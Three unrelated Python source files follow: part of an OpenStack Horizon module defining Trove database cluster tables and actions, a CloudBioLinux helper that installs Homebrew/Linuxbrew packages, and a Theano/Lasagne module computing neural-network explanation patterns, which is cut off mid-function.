verbose_name = _("Shrink Cluster")
url = "horizon:project:database_clusters:cluster_shrink_details"
def allowed(self, request, cluster=None):
if (cluster and cluster.task["name"] == 'NONE' and
db_capability.can_modify_cluster(cluster.datastore['type'])):
return True
return False
class ResetPassword(tables.LinkAction):
name = "reset_password"
verbose_name = _("Reset Root Password")
url = "horizon:project:database_clusters:reset_password"
classes = ("ajax-modal",)
def allowed(self, request, cluster=None):
if (cluster and cluster.task["name"] == 'NONE' and
db_capability.is_vertica_datastore(cluster.datastore['type'])):
return True
return False
def get_link_url(self, datum):
cluster_id = self.table.get_object_id(datum)
return urlresolvers.reverse(self.url, args=[cluster_id])
class UpdateRow(tables.Row):
ajax = True
@memoized.memoized_method
def get_data(self, request, cluster_id):
cluster = api.trove.cluster_get(request, cluster_id)
try:
# TODO(michayu): assumption that cluster is homogeneous
flavor_id = cluster.instances[0]['flavor']['id']
cluster.full_flavor = api.trove.flavor_get(request, flavor_id)
except Exception:
pass
return cluster
def get_datastore(cluster):
return cluster.datastore["type"]
def get_datastore_version(cluster):
return cluster.datastore["version"]
def get_size(cluster):
if db_capability.is_vertica_datastore(cluster.datastore['type']):
return "3"
if hasattr(cluster, "full_flavor"):
size_string = _("%(name)s | %(RAM)s RAM | %(instances)s instances")
vals = {'name': cluster.full_flavor.name,
'RAM': sizeformat.mbformat(cluster.full_flavor.ram),
'instances': len(cluster.instances)}
return size_string % vals
elif hasattr(cluster, "instances"):
return "%s instances" % len(cluster.instances)
return _("Not available")
def get_task(cluster):
return cluster.task["name"]
class ClustersTable(tables.DataTable):
TASK_CHOICES = (
("none", True),
)
name = tables.Column("name",
link=("horizon:project:database_clusters:detail"),
verbose_name=_("Cluster Name"))
datastore = tables.Column(get_datastore,
verbose_name=_("Datastore"))
datastore_version = tables.Column(get_datastore_version,
verbose_name=_("Datastore Version"))
size = tables.Column(get_size,
verbose_name=_("Cluster Size"),
attrs={'data-type': 'size'})
task = tables.Column(get_task,
filters=(title, filters.replace_underscores),
verbose_name=_("Current Task"),
status=True,
status_choices=TASK_CHOICES)
class Meta(object):
name = "clusters"
verbose_name = _("Clusters")
status_columns = ["task"]
row_class = UpdateRow
table_actions = (LaunchLink, DeleteCluster)
row_actions = (ClusterGrow, ClusterShrink, ResetPassword,
DeleteCluster)
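# Illustrative sketch (assumption -- the corresponding view module is not shown
# here) of how ClustersTable is typically wired into a Horizon panel; the class
# and template names below are hypothetical:
#
#   from horizon import tables as horizon_tables
#
#   class IndexView(horizon_tables.DataTableView):
#       table_class = ClustersTable
#       template_name = "project/database_clusters/index.html"
#
#       def get_data(self):
#           return api.trove.cluster_list(self.request)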
def get_instance_size(instance):
if hasattr(instance, "full_flavor"):
size_string = _("%(name)s | %(RAM)s RAM")
vals = {'name': instance.full_flavor.name,
'RAM': sizeformat.mbformat(instance.full_flavor.ram)}
return size_string % vals
return _("Not available")
def get_instance_type(instance):
if hasattr(instance, "type"):
return instance.type
return _("Not available")
def get_host(instance):
if hasattr(instance, "hostname"):
return instance.hostname
elif hasattr(instance, "ip") and instance.ip:
return instance.ip[0]
return _("Not Assigned")
class InstancesTable(tables.DataTable):
name = tables.Column("name",
verbose_name=_("Name"))
type = tables.Column(get_instance_type,
verbose_name=_("Type"))
host = tables.Column(get_host,
verbose_name=_("Host"))
size = tables.Column(get_instance_size,
verbose_name=_("Size"),
attrs={'data-type': 'size'})
status = tables.Column("status",
filters=(title, filters.replace_underscores),
verbose_name=_("Status"))
class Meta(object):
name = "instances"
verbose_name = _("Instances")
class ClusterShrinkAction(tables.BatchAction):
name = "cluster_shrink_action"
icon = "remove"
classes = ('btn-danger',)
success_url = 'horizon:project:database_clusters:index'
help_text = _("Shrinking a cluster is not recoverable.")
@staticmethod
def action_present(count):
return ungettext_lazy(
u"Shrink Cluster",
u"Shrink Cluster",
count
)
@staticmethod
def action_past(count):
return ungettext_lazy(
u"Scheduled Shrinking of Cluster",
u"Scheduled Shrinking of Cluster",
count
)
def handle(self, table, request, obj_ids):
datum_display_objs = []
for datum_id in obj_ids:
datum = table.get_object_by_id(datum_id)
datum_display = table.get_object_display(datum) or datum_id
datum_display_objs.append(datum_display)
display_str = functions.lazy_join(", ", datum_display_objs)
try:
cluster_id = table.kwargs['cluster_id']
data = [{'id': instance_id} for instance_id in obj_ids]
api.trove.cluster_shrink(request, cluster_id, data)
LOG.info('%s: "%s"' %
(self._get_action_name(past=True),
display_str))
msg = _('Removed instances from cluster.')
messages.info(request, msg)
except Exception as ex:
LOG.error('Action %(action)s failed with %(ex)s for %(data)s' %
{'action': self._get_action_name(past=True).lower(),
'ex': ex.message,
'data': display_str})
msg = _('Unable to remove instances from cluster: %s')
messages.error(request, msg % ex.message)
return shortcuts.redirect(self.get_success_url(request))
class ClusterShrinkInstancesTable(tables.DataTable):
name = tables.Column("name",
verbose_name=_("Name"))
status = tables.Column("status",
filters=(title, filters.replace_underscores),
verbose_name=_("Status"))
class Meta(object):
name = "shrink_cluster_table"
verbose_name = _("Instances")
table_actions = (ClusterShrinkAction,)
row_actions = (ClusterShrinkAction,)
class ClusterGrowAddInstance(tables.LinkAction):
name = "cluster_grow_add_instance"
verbose_name = _("Add Instance")
url = "horizon:project:database_clusters:add_instance"
classes = ("ajax-modal",)
def get_link_url(self):
return urlresolvers.reverse(
self.url, args=[self.table.kwargs['cluster_id']])
class ClusterGrowRemoveInstance(tables.BatchAction):
name = "cluster_grow_remove_instance"
@staticmethod
def action_present(count):
return ungettext_lazy(
u"Remove Instance",
u"Remove Instances",
count
)
@staticmethod
def action_past(count):
return ungettext_lazy(
u"Removed Instance",
u"Removed Instances",
count
)
def action(self, request, datum_id):
manager = cluster_manager.get(self.table.kwargs['cluster_id'])
manager.delete_instance(datum_id)
def handle(self, table, request, obj_ids):
action_success = []
action_failure = []
action_not_allowed = []
for datum_id in obj_ids:
datum = table.get_object_by_id(datum_id)
datum_display = table.get_object_display(datum) or datum_id
if not table._filter_action(self, request, datum):
action_not_allowed.append(datum_display)
LOG.warning('Permission denied to %s: "%s"' %
(self._get_action_name(past=True).lower(),
datum_display))
continue
try:
self.action(request, datum_id)
# Call update to invoke changes if needed
self.update(request, datum)
action_success.append(datum_display)
self.success_ids.append(datum_id)
LOG.info('%s: "%s"' %
(self._get_action_name(past=True), datum_display))
except Exception as ex:
# Handle the exception but silence it since we'll display
# an aggregate error message later. Otherwise we'd get
# multiple error messages displayed to the user.
action_failure.append(datum_display)
action_description = (
self._get_action_name(past=True).lower(), datum_display)
LOG.error(
'Action %(action)s Failed for %(reason)s', {
'action': action_description, 'reason': ex})
if action_not_allowed:
msg = _('You are not allowed to %(action)s: %(objs)s')
params = {"action":
self._get_action_name(action_not_allowed).lower(),
"objs": functions.lazy_join(", ", action_not_allowed)}
messages.error(request, msg % params)
if action_failure:
msg = _('Unable to %(action)s: %(objs)s')
params = {"action": self._get_action_name(action_failure).lower(),
"objs": functions.lazy_join(", ", action_failure)}
messages.error(request, msg % params)
return shortcuts.redirect(self.get_success_url(request))
class ClusterGrowAction(tables.Action):
name = "grow_cluster_action"
verbose_name = _("Grow Cluster")
verbose_name_plural = _("Grow Cluster")
requires_input = False
icon = "plus"
def handle(self, table, request, obj_ids):
if not table.data:
msg = _("Cannot grow cluster. No instances specified.")
messages.info(request, msg)
return shortcuts.redirect(request.build_absolute_uri())
datum_display_objs = []
for instance in table.data:
msg = _("[flavor=%(flavor)s, volume=%(volume)s, name=%(name)s, "
"type=%(type)s, related_to=%(related_to)s, "
"nics=%(nics)s]")
params = {"flavor": instance.flavor_id, "volume": instance.volume,
"name": instance.name, "type": instance.type,
"related_to": instance.related_to, "nics": instance.nics}
datum_display_objs.append(msg % params)
display_str = functions.lazy_join(", ", datum_display_objs)
cluster_id = table.kwargs['cluster_id']
try:
api.trove.cluster_grow(request, cluster_id, table.data)
LOG.info('%s: "%s"' % (_("Grow Cluster"), display_str))
msg = _('Scheduled growing of cluster.')
messages.success(request, msg)
except Exception as ex:
LOG.error('Action grow cluster failed with %(ex)s for %(data)s' %
{'ex': ex.message,
'data': display_str})
msg = _('Unable to grow cluster: %s')
messages.error(request, msg % ex.message)
finally:
cluster_manager.delete(cluster_id)
return shortcuts.redirect(urlresolvers.reverse(
"horizon:project:database_clusters:index"))
class ClusterGrowInstancesTable(tables.DataTable):
id = tables.Column("id", hidden=True)
name = tables.Column("name", verbose_name=_("Name"))
flavor = tables.Column("flavor", verbose_name=_("Flavor"))
flavor_id = tables.Column("flavor_id", hidden=True)
volume = tables.Column("volume", verbose_name=_("Volume"))
type = tables.Column("type", verbose_name=_("Instance Type"))
related_to = tables.Column("related_to", verbose_name=_("Related To"))
nics = tables.Column("nics", verbose_name=_("Network"))
class Meta(object):
name = "cluster_grow_instances_table"
verbose_name = _("Instances")
table_actions = (ClusterGrowAddInstance, ClusterGrowRemoveInstance,
ClusterGrowAction)
row_actions = (ClusterGrowRemoveInstance,)
|
|
"""Install packages via the MacOSX Homebrew and Linux Linuxbrew package manager.
https://github.com/mxcl/homebrew
https://github.com/Homebrew/linuxbrew
"""
from __future__ import print_function
import contextlib
from distutils.version import LooseVersion
import os
import sys
import yaml
from cloudbio.custom import system, shared
from cloudbio.flavor.config import get_config_file
from cloudbio.fabutils import quiet, find_cmd
from cloudbio.package import cpan
from cloudbio.package.shared import _yaml_to_packages
from fabric.api import cd, settings
BOTTLE_URL = "https://s3.amazonaws.com/cloudbiolinux/brew_bottles/{pkg}-{version}.x86_64-linux.bottle.tar.gz"
BOTTLE_SUPPORTED = set(["isaac-aligner", "isaac-variant-caller", "cmake"])
def install_packages(env, to_install=None, packages=None):
"""Install packages using the home brew package manager.
Handles upgrading brew, tapping required repositories and installing or upgrading
packages as appropriate.
`to_install` is a CloudBioLinux compatible set of top level items to add,
alternatively `packages` is a list of raw package names.
"""
config_file = get_config_file(env, "packages-homebrew.yaml")
if to_install:
(packages, _) = _yaml_to_packages(config_file.base, to_install, config_file.dist)
# if we have no packages to install, do not try to install or update brew
if len(packages) == 0:
_remove_old(env, config_file.base)
return
system.install_homebrew(env)
brew_cmd = _brew_cmd(env)
formula_repos = ["homebrew/science", "chapmanb/cbl", "homebrew/dupes"]
current_taps = set([x.strip() for x in env.safe_run_output("%s tap" % brew_cmd).split()])
_safe_update(env, brew_cmd, formula_repos, current_taps)
current_taps = set([x.strip() for x in env.safe_run_output("%s tap" % brew_cmd).split()])
for repo in formula_repos:
if repo not in current_taps:
env.safe_run("%s tap %s" % (brew_cmd, repo))
env.safe_run("%s tap --repair" % brew_cmd)
ipkgs = {"outdated": set([x.strip() for x in env.safe_run_output("%s outdated" % brew_cmd).split()]),
"current": _get_current_pkgs(env, brew_cmd)}
_install_brew_baseline(env, brew_cmd, ipkgs, packages)
ipkgs = {"outdated": set([x.strip() for x in env.safe_run_output("%s outdated" % brew_cmd).split()]),
"current": _get_current_pkgs(env, brew_cmd)}
for pkg_str in packages:
_install_pkg(env, pkg_str, brew_cmd, ipkgs)
for pkg_str in ["pkg-config", "openssl", "cmake", "unzip"]:
_safe_unlink_pkg(env, pkg_str, brew_cmd)
with open(config_file.base) as in_handle:
to_remove = yaml.safe_load(in_handle).get("to_remove", [])
for pkg_str in ["curl"] + to_remove:
_safe_uninstall_pkg(env, pkg_str, brew_cmd)
def _remove_old(env, config_file):
"""Temporary approach to remove an old brew install migrated to conda packages.
"""
brew_cmd = os.path.join(env.system_install, "bin", "brew")
if env.safe_exists(brew_cmd):
baseline = ["pkg-config", "openssl", "cmake", "unzip", "curl"]
with open(config_file) as in_handle:
to_remove = yaml.safe_load(in_handle).get("to_remove", [])
for pkg_str in baseline + to_remove:
_safe_uninstall_pkg(env, pkg_str, brew_cmd)
def _safe_update(env, brew_cmd, formula_repos, cur_taps):
"""Revert any taps if we fail to update due to local changes.
"""
with _git_stash(env, brew_cmd):
with quiet():
with settings(warn_only=True):
out = env.safe_run("%s update" % brew_cmd)
if out.failed:
for repo in formula_repos:
if repo in cur_taps:
env.safe_run("%s untap %s" % (brew_cmd, repo))
with settings(warn_only=True):
out = env.safe_run("%s update" % brew_cmd)
if out.failed:
print("\n\nHomebrew update failed.")
print("You might need to upgrade git by installing inside bcbio with:")
print("'brew install git --env=inherit --ignore-dependences'\n\n")
@contextlib.contextmanager
def _git_stash(env, brew_cmd):
"""Perform a safe git stash around an update.
This circumvents brew's internal stash approach, which doesn't work on older versions
of git and is sensitive to a missing git user.email configuration.
"""
brew_prefix = env.safe_run_output("{brew_cmd} --prefix".format(**locals()))
with cd(brew_prefix):
with quiet():
with settings(warn_only=True):
env.safe_run("git config user.email '[email protected]'")
check_diff = env.safe_run("git diff --quiet")
git_version = env.safe_run_output("git --version").strip().split()[-1]
if git_version and LooseVersion(git_version) < LooseVersion("1.7"):
if check_diff.return_code > 0:
with cd(brew_prefix):
with settings(warn_only=True):
env.safe_run("git stash --quiet")
try:
yield None
finally:
if check_diff.return_code > 0:
with cd(brew_prefix):
with settings(warn_only=True):
env.safe_run("git stash pop --quiet")
else:
yield None
def _get_current_pkgs(env, brew_cmd):
out = {}
with quiet():
which_out = env.safe_run_output("{brew_cmd} list --versions".format(**locals()))
for line in which_out.split("\n"):
if line:
parts = line.rstrip().split()
if len(parts) == 2:
pkg, version = line.rstrip().split()
if pkg.endswith(":"):
pkg = pkg[:-1]
out[pkg] = version
return out
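# For reference (assumed typical `brew list --versions` output): a line such as
# "bwa 0.7.12" becomes the entry {"bwa": "0.7.12"}; lines listing several
# versions at once have more than two columns and are skipped by the length
# check above.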
def _safe_unlink_pkg(env, pkg_str, brew_cmd):
"""Unlink packages which can cause issues with a Linux system.
"""
with settings(warn_only=True):
with quiet():
env.safe_run("{brew_cmd} unlink {pkg_str}".format(**locals()))
def _safe_link_pkg(env, pkg_str, brew_cmd):
"""Link packages required for builds, but not necessarily installed
"""
with settings(warn_only=True):
with quiet():
env.safe_run("{brew_cmd} link --overwrite {pkg_str}".format(**locals()))
def _safe_uninstall_pkg(env, pkg_str, brew_cmd):
"""Uninstall packages which get pulled in even when unlinked by brew.
"""
with settings(warn_only=True):
with quiet():
env.safe_run("{brew_cmd} uninstall {pkg_str}".format(**locals()))
def _install_pkg(env, pkg_str, brew_cmd, ipkgs):
"""Install a specific brew package, handling versioning and existing packages.
"""
pkg, version, args = _get_pkg_version_args(pkg_str)
installed = False
if version:
_install_pkg_version(env, pkg, args, version, brew_cmd, ipkgs)
installed = True
if pkg in BOTTLE_SUPPORTED and not env.distribution == "macosx":
installed = _install_bottle(env, brew_cmd, pkg, ipkgs)
if not installed:
_install_pkg_latest(env, pkg, args, brew_cmd, ipkgs)
def _install_pkg_version(env, pkg, args, version, brew_cmd, ipkgs):
"""Install a specific version of a package by retrieving from git history.
https://gist.github.com/gcatlin/1847248
Handles both global packages and those installed via specific taps.
"""
if ipkgs["current"].get(pkg.split("/")[-1]) == version:
return
if version == "HEAD":
args = " ".join(args)
brew_install = _get_brew_install_cmd(brew_cmd, env, pkg)
env.safe_run("{brew_install} {args} --HEAD {pkg}".format(**locals()))
else:
raise ValueError("Cannot currently handle installing brew packages by version.")
with _git_pkg_version(env, brew_cmd, pkg, version):
if pkg.split("/")[-1] in ipkgs["current"]:
with settings(warn_only=True):
env.safe_run("{brew_cmd} unlink {pkg}".format(
brew_cmd=brew_cmd, pkg=pkg.split("/")[-1]))
# if we have a more recent version, uninstall that first
cur_version_parts = env.safe_run_output("{brew_cmd} list --versions {pkg}".format(
brew_cmd=brew_cmd, pkg=pkg.split("/")[-1])).strip().split()
if len(cur_version_parts) > 1 and LooseVersion(cur_version_parts[1]) > LooseVersion(version):
with settings(warn_only=True):
env.safe_run("{brew_cmd} uninstall {pkg}".format(**locals()))
env.safe_run("{brew_cmd} install {pkg}".format(**locals()))
with settings(warn_only=True):
env.safe_run("{brew_cmd} switch {pkg} {version}".format(**locals()))
env.safe_run("%s link --overwrite %s" % (brew_cmd, pkg))
@contextlib.contextmanager
def _git_pkg_version(env, brew_cmd, pkg, version):
"""Convert homebrew Git to previous revision to install a specific package version.
"""
git_cmd = _git_cmd_for_pkg_version(env, brew_cmd, pkg, version)
git_fname = git_cmd.split()[-1]
brew_prefix = env.safe_run_output("{brew_cmd} --prefix".format(**locals()))
if git_fname.startswith("{brew_prefix}/Library/Taps/".format(**locals())):
brew_prefix = os.path.dirname(git_fname)
try:
with cd(brew_prefix):
if version != "HEAD":
env.safe_run(git_cmd)
yield
finally:
# reset Git back to latest
with cd(brew_prefix):
if version != "HEAD":
cmd_parts = git_cmd.split()
env.safe_run("%s reset HEAD %s" % (cmd_parts[0], cmd_parts[-1]))
cmd_parts[2] = "--"
env.safe_run(" ".join(cmd_parts))
def _git_cmd_for_pkg_version(env, brew_cmd, pkg, version):
"""Retrieve git command to check out a specific version from homebrew.
"""
git_cmd = None
for git_line in env.safe_run_output("{brew_cmd} versions {pkg}".format(**locals())).split("\n"):
if git_line.startswith(version):
git_cmd = " ".join(git_line.rstrip().split()[1:])
break
if git_cmd is None:
raise ValueError("Did not find version %s for %s" % (version, pkg))
return git_cmd
def _latest_pkg_version(env, brew_cmd, pkg, devel=False):
"""Retrieve the latest available version of a package and if it is linked.
"""
i = 0
version, is_linked = None, False
with settings(warn_only=True):
info_str = env.safe_run_output("{brew_cmd} info {pkg}".format(**locals()))
for i, git_line in enumerate(info_str.split("\n")):
if git_line.strip():
if i == 0:
_, version_str = git_line.split(":")
versions = version_str.split(",")
if devel:
dev_strs = [x for x in versions if x.strip().startswith("devel")]
version = dev_strs[0].split()[-1].strip()
else:
version = versions[0].replace("(bottled)", "").split()[-1].strip()
elif git_line.find("Cellar/%s" % pkg) > 0 and git_line.find(" files,") > 0:
is_linked = git_line.strip().split()[-1] == "*"
return version, is_linked
def _get_brew_install_cmd(brew_cmd, env, pkg):
perl_setup = "export PERL5LIB=%s/lib/perl5:${PERL5LIB}" % env.system_install
compiler_setup = "export CC=${CC:-`which gcc`} && export CXX=${CXX:-`which g++`}"
shell_setup = "export SHELL=${SHELL:-/bin/bash}"
extra_args = ""
if pkg in ["cmake"]:
extra_args += " --without-docs"
if pkg in ["lumpy-sv", "bamtools", "freebayes", "git"]:
extra_args += " --ignore-dependencies"
return "%s && %s && %s && %s install --env=inherit %s" % (compiler_setup, shell_setup, perl_setup,
brew_cmd, extra_args)
def _install_pkg_latest(env, pkg, args, brew_cmd, ipkgs):
"""Install the latest version of the given package.
"""
short_pkg = pkg.split("/")[-1]
do_install = True
is_linked = True
remove_old = False
if pkg in ipkgs["outdated"] or short_pkg in ipkgs["outdated"]:
remove_old = True
elif pkg in ipkgs["current"] or short_pkg in ipkgs["current"]:
do_install = False
pkg_version, is_linked = _latest_pkg_version(env, brew_cmd, pkg, devel="--devel" in args)
cur_version = ipkgs["current"].get(pkg, ipkgs["current"][short_pkg])
if cur_version != pkg_version and cur_version.split("_")[0] != pkg_version:
remove_old = True
do_install = True
if do_install:
if remove_old:
env.safe_run("{brew_cmd} remove --force {short_pkg}".format(**locals()))
flags = " ".join(args)
with settings(warn_only=True):
cmd = "%s %s %s" % (_get_brew_install_cmd(brew_cmd, env, pkg), flags, pkg)
with _custom_unlink(env, brew_cmd, pkg):
result = env.safe_run_output(cmd)
if result.failed and not result.find("Could not symlink") > 0:
sys.tracebacklimit = 1
raise ValueError("Failed to install brew formula: %s\n" % pkg +
"To debug, please try re-running the install command with verbose output:\n" +
cmd.replace("brew install", "brew install -v"))
env.safe_run("%s link --overwrite %s" % (brew_cmd, pkg))
# installed but not linked
elif not is_linked:
env.safe_run("%s link --overwrite %s" % (brew_cmd, pkg))
@contextlib.contextmanager
def _custom_unlink(env, brew_cmd, pkg):
"""Handle custom unlinking of packages that can break builds of others.
Does a temporary unlink and relink of packages while building.
"""
unlinks = {"lumpy-sv": ["bamtools"]}
for upkg in unlinks.get(pkg, []):
_safe_unlink_pkg(env, upkg, brew_cmd)
try:
yield None
finally:
for upkg in unlinks.get(pkg, []):
with settings(warn_only=True):
with quiet():
env.safe_run("%s link --overwrite %s" % (brew_cmd, upkg))
def _get_pkg_version_args(pkg_str):
"""Uses Python style package==0.1 version specifications and args separated with ';'
"""
arg_parts = pkg_str.split(";")
if len(arg_parts) == 1:
args = []
else:
pkg_str = arg_parts[0]
args = arg_parts[1:]
parts = pkg_str.split("==")
if len(parts) == 1:
return parts[0], None, args
else:
assert len(parts) == 2
name, version = parts
return name, version, args
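# A few worked examples of the "name==version;arg1;arg2" convention parsed above.
def _pkg_version_args_examples():
    """Illustrative self-check (not called by the installer itself); the
    package names below are arbitrary examples.
    """
    assert _get_pkg_version_args("samtools") == ("samtools", None, [])
    assert _get_pkg_version_args("samtools==0.1.19") == ("samtools", "0.1.19", [])
    assert _get_pkg_version_args("cmake;--without-docs") == ("cmake", None, ["--without-docs"])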
def _install_bottle(env, brew_cmd, pkg, ipkgs):
"""Install Linux bottles for brew packages that can be tricky to build.
"""
if env.distribution == "macosx": # Only Linux bottles, build away on Mac
return False
pkg_version, is_linked = _latest_pkg_version(env, brew_cmd, pkg)
install_version = ipkgs["current"].get(pkg)
if pkg_version == install_version: # Up to date
if not is_linked:
env.safe_run("%s link --overwrite %s" % (brew_cmd, pkg))
return True
elif install_version or pkg in ipkgs["outdated"]:
env.safe_run("{brew_cmd} remove --force {pkg}".format(**locals()))
url = BOTTLE_URL.format(pkg=pkg, version=pkg_version)
brew_cachedir = env.safe_run_output("%s --cache" % brew_cmd)
brew_cellar = os.path.join(env.safe_run_output("%s --prefix" % brew_cmd), "Cellar")
with quiet():
env.safe_run("mkdir -p %s" % brew_cellar)
out_file = os.path.join(brew_cachedir, os.path.basename(url))
if env.safe_exists(out_file):
env.safe_run("rm -f %s" % out_file)
bottle_file = shared._remote_fetch(env, url, out_file=out_file,
allow_fail=True, samedir=True)
if bottle_file:
with cd(brew_cellar):
env.safe_run("tar -xf %s" % bottle_file)
env.safe_run("%s link --overwrite %s" % (brew_cmd, pkg))
return True
else:
return False
def _install_brew_baseline(env, brew_cmd, ipkgs, packages):
"""Install baseline brew components not handled by dependency system.
- Installation of required Perl libraries.
- Upgrades any package dependencies
"""
for dep in ["openssl"]:
_safe_link_pkg(env, dep, brew_cmd)
for dep in ["expat", "pkg-config", "xz", "unzip"]:
_install_pkg(env, dep, brew_cmd, ipkgs)
# check if we have an older git and need to install it from brew
git_version = None
with quiet():
with settings(warn_only=True):
git_version = env.safe_run_output("git --version").strip().split()[-1]
if git_version and LooseVersion(git_version) < LooseVersion("1.7"):
_install_pkg(env, "git", brew_cmd, ipkgs)
for dep in ["sambamba"]: # Avoid conflict with homebrew-science sambamba
env.safe_run("{brew_cmd} remove --force {dep}".format(**locals()))
for dependency in ["htslib"]:
if dependency in packages:
if (dependency in ipkgs["outdated"] or "chapmanb/cbl/%s" % dependency in ipkgs["outdated"]
or dependency not in ipkgs["current"]):
_install_pkg_latest(env, dependency, [], brew_cmd, ipkgs)
if "cpanminus" in packages:
_install_pkg_latest(env, "cpanminus", [], brew_cmd, ipkgs)
_install_pkg_latest(env, "samtools-library-0.1", [], brew_cmd, ipkgs)
cpan.install_packages(env)
# Ensure paths we may have missed on install are accessible to regular user
if env.use_sudo:
paths = ["share", "share/java"]
for path in paths:
with quiet():
test_access = env.safe_run("test -d %s/%s && test -O %s/%s" % (env.system_install, path,
env.system_install, path))
if test_access.failed and env.safe_exists("%s/%s" % (env.system_install, path)):
env.safe_sudo("chown %s %s/%s" % (env.user, env.system_install, path))
def _brew_cmd(env):
"""Retrieve brew command for installing homebrew packages.
"""
cmd = find_cmd(env, "brew", "--version")
if cmd is None:
raise ValueError("Did not find working installation of Linuxbrew/Homebrew. "
"Please check if you have ruby available.")
else:
return cmd
|
|
# Begin: Python 2/3 compatibility header small
# Get Python 3 functionality:
from __future__ import\
absolute_import, print_function, division, unicode_literals
from future.utils import raise_with_traceback, raise_from
# catch exception with: except Exception as e
from builtins import range, map, zip, filter
from io import open
import six
# End: Python 2/3 compatibility header small
import lasagne.layers as L
import numpy as np
import theano
import theano.tensor as T
from .base import BasePatternComputer
__all__ = [
"CombinedPatternComputer"
]
# How everything fits together :
# Pattern types and the filter function.
subtypes = [
('basic', lambda x: 1.0+0.0*x),
('positive_y', lambda x: 1.0*T.gt(x,0.0)),
('negative_y', lambda x: 1.0-1.0*T.gt(x,0.0))
]
# Statistics needed for each pattern type.
subtype_keys = [
'cnt', # Number of samples per variable.
'm_x', # Mean along x.
'm_y', # Mean along y.
'xty', # Covariance of x and y.
'yty', # Covariance of y and y.
]
# This has a specific aggregation function.
subtype_keys_no_aggregation = ['cnt']
# Create new stats dict.
def create_dict(new_stats):
ret = []
n_per_dict = len(subtypes)*len(subtype_keys)
for i in range(0, len(new_stats), n_per_dict):
ret.append(list_to_dict(new_stats[i : i+n_per_dict]))
return ret
# Stats list to dict.
def list_to_dict(stats_list):
stats_dict = dict()
idx = 0
for key, _ in subtypes:
stats_dict[key]=dict()
for sub_key in subtype_keys:
stats_dict[key][sub_key] = stats_list[idx]
idx+=1
return stats_dict
# Stats dict to list
def dict_to_list(stats_dict):
stats_list = []
for key,_ in subtypes:
for sub_key in subtype_keys:
stats_list.append(stats_dict[key][sub_key])
return stats_list
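# Illustrative round-trip (not used by the computer itself): the flat statistics
# list is ordered by subtype first, then by statistic key, i.e. 3 subtypes x 5
# keys = 15 entries per layer, and list_to_dict/dict_to_list are inverses.
def _stats_roundtrip_example():
    flat = list(range(len(subtypes) * len(subtype_keys)))  # 15 dummy values
    as_dict = list_to_dict(flat)
    assert as_dict['basic']['cnt'] == 0          # first entry is basic/cnt
    assert dict_to_list(as_dict) == flat         # ordering is preserved
    return as_dict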
class CombinedPatternComputer(BasePatternComputer):
def get_split(self, layer,
deterministic=True, conv_all_patches=True, **kwargs):
# Get the patches and the outputs without the non-linearities.
if type(layer) is L.DenseLayer:
x, y = get_dense_xy(layer, deterministic)
elif type(layer) is L.Conv2DLayer:
if conv_all_patches is True:
x, y = get_conv_xy_all(layer, deterministic)
else:
x, y = get_conv_xy(layer, deterministic)
else:
raise ValueError("Unknown layer as input")
# Create an output dictionary
outputs = dict()
for name, fun in subtypes:
outputs[name] = dict()
mrk_y = 1.0* T.cast(fun(y), dtype=theano.config.floatX) # (N,O)
y_current = y*mrk_y # This has a binary mask
cnt_y = T.shape_padaxis(T.sum(mrk_y, axis=0), axis=0) # (1,O)
norm = T.maximum(cnt_y, 1.)
# Count how many datapoints are considered
outputs[name]['cnt'] = cnt_y
# The mean of the current batch
outputs[name]['m_y'] = T.shape_padaxis(y_current.sum(axis=0), axis=0) / norm # (1,O) mean output for batch
outputs[name]['m_x'] = T.dot(x.T, mrk_y) / norm # (D,O) mean input for batch
# The mean of the current batch
outputs[name]['yty'] = T.shape_padaxis(T.sum(y_current ** 2., axis=0), axis=0) / norm # (1,O)
outputs[name]['xty'] = T.dot(x.T, y_current) / norm # D,O
return dict_to_list(outputs)
def _update_statistics(self, new_stats, stats):
new_stats = create_dict(new_stats)
if stats is None:
stats = new_stats
return stats
# update the stats layerwise
for l_i in range(len(stats)):
for subtype,_ in subtypes:
# TODO: Have to check the type to see if this is needed
cnt_old = 1.0 * stats[l_i][subtype]['cnt']
stats[l_i][subtype]['cnt'] = (stats[l_i][subtype]['cnt']
+ new_stats[l_i][subtype]['cnt'])
norm = np.maximum(stats[l_i][subtype]['cnt'], 1.0)
for key in subtype_keys:
if key not in subtype_keys_no_aggregation:
tmp_old = cnt_old / norm * stats[l_i][subtype][key]
tmp_new = (new_stats[l_i][subtype]['cnt']
/ norm * new_stats[l_i][subtype][key])
stats[l_i][subtype][key] = tmp_old + tmp_new
return stats
def _compute_Exy_ExEy(self,stats,key,l_i):
return (stats[l_i][key]['xty']
- stats[l_i][key]['m_x'] * stats[l_i]['basic']['m_y']) # D,O
def _get_W(self, id):
dl = self.layers[id]
W = dl.W.get_value()
if W.ndim == 4:
if dl.flip_filters:
W = W[:, :, ::-1, ::-1]
W = get_2D(W)
return W
def _update_length(self, A, id):
W = self._get_W(id)
norm = np.diag(np.dot(get_2D(W).T,A))[np.newaxis]
norm = norm + 1.0*(norm == 0.0)
return A / norm
def _compute_A(self, stats, key, l_i):
W = self._get_W(l_i) #D,O
numerator = self._compute_Exy_ExEy(stats, key, l_i) #D,O
denumerator = np.dot(W.T,numerator) #O,O
denumerator = np.diag(denumerator) #1,O
if np.sum(denumerator == 0) > 0:
denumerator= denumerator + 1.0*(denumerator==0)
A = numerator / denumerator[np.newaxis]
A = self._update_length(A, l_i)
return A
def _compute_patterns(self, stats):
patterns = dict()
for key,_ in subtypes:
patterns[key]=dict()
patterns[key]['A'] = []
patterns[key]['r'] = []
patterns[key]['mu'] = []
for l_i in range(len(stats)):
# using uppercase now
A = self._compute_A(stats, key, l_i)
r = stats[l_i][key]['m_x'] - A * stats[l_i][key]['m_y'] # D,O
mu = stats[l_i][key]['m_x']
if self.layers[l_i].W.get_value().ndim == 4:
A = A.T.reshape(self.layers[l_i].W.get_value().shape)
r = r.T.reshape(A.shape)
mu = mu.T.reshape(A.shape)
assert np.sum(np.isnan(A)) == 0, "Something went wrong, nan in A"
patterns[key]['A'].append(A.astype(np.float32))
patterns[key]['r'].append(r.astype(np.float32))
patterns[key]['mu'].append(mu.astype(np.float32))
return patterns
def process_batches(self, X_train, batch_size, n_batches=None, **kwargs):
is_generator = type(X_train) not in [np.ndarray, np.core.memmap]
if is_generator is True:
if n_batches is None:
raise ValueError("X_train is generator, in this case "
"n_batches needs to be specified.")
else:
n_datapoints = X_train.shape[0]
n_batches = n_datapoints // batch_size
stats = None
for i in range(n_batches):
# Load batch
if is_generator:
X = X_train()
else:
X = X_train[i*batch_size : (i+1)*batch_size]
# Get components from the GPU
new_stats = self.f(X)
# Update stats.
